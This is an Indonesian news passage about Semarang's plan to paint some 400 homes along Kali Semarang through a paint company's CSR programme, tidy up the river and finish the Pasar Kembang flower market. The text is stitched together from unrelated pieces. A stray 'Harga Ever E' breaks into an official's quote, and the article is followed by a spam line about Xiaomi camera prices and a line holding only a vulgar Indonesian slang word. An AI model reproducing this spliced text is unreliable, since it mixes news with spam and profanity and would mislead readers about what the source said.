Untuk mengecat rumah warga di sekitar Kali Semarang, Hendrar secara intensif menjalin komunikasi dengan warga. Di sisi yang lain, sudah ada perusahaan cat yang menawarkan program corporate social responsibility (CSR) untuk mengecat rumah secara warna warni. Untuk itu, pihaknya sedang mencari waktu tepat untuk menata kawasan dekat Tugu Muda tersebut.

"Sudah ada perusahaan cat yang bersedia membantu. Tinggal cari momentum pas selain musim hujan, karena kalau hujan cat tidak maksimal," ujar Hendrar. Bersamaan dengan itu, Kali Semarang juga akan dipercantik. Gundukan sampah serta aliran yang menyempit akan dilebarkan seperti sedia kala. Penataan sungai bertahap dilakukan pada 2017. "Kalau penataan sungai masuk tahap 2 pada 2017. Tahap pertama bangunan ini. Nanti kami minta bantuan," ujar dia.

Kepala Dinas Tata Kota dan Pemukiman Agus Riyanto menyebut rumah warga yang dicat sekitar 400 rumah. Rumah itu seluruhnya berada di bantaran Kali Semarang. "Ada 400 sekitar rumah yang dicat. Harga Ever E Nanti kita cari waktu selain musim penghujan," ujar Agus. Pembangunan Pasar Kembang pada tahap pertama sudah 92 persen. Pasar dibangun dua lantai yang tepat berada di sisi Kali Semarang.

Lantai pertama untuk pemesanan, sementara lantai dua untuk tempat pameran bunga. Bangunan pasar juga dilengkapi dengan trotoar yang cukup lebar. Bangunan memanjang dibagi beberapa gedung itu mampu menampung sekitar 90 pedagang bunga. Pembangunan seluruhnya rampung pada pertengahan bulan Desember 2016.

0
24 Info Harga Terbaru
ok yang lagi mencari informasi harga terbaru seputar harga kamera xiaomi terbaru masuk sini
0
25 kontol
kontol
0